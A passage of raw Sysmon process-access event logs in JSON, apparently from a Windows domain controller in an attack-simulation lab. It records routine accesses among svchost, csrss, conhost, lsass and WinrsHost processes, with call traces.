05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5045,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5046,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.297\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.297","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5047,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.297\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010C2BE0900}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.297","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010C2BE0900}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5048,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010C2BE0900}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010C2BE0900}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5049,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1772\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010C2BE0900}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1772","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010C2BE0900}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5050,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5051,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5052,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
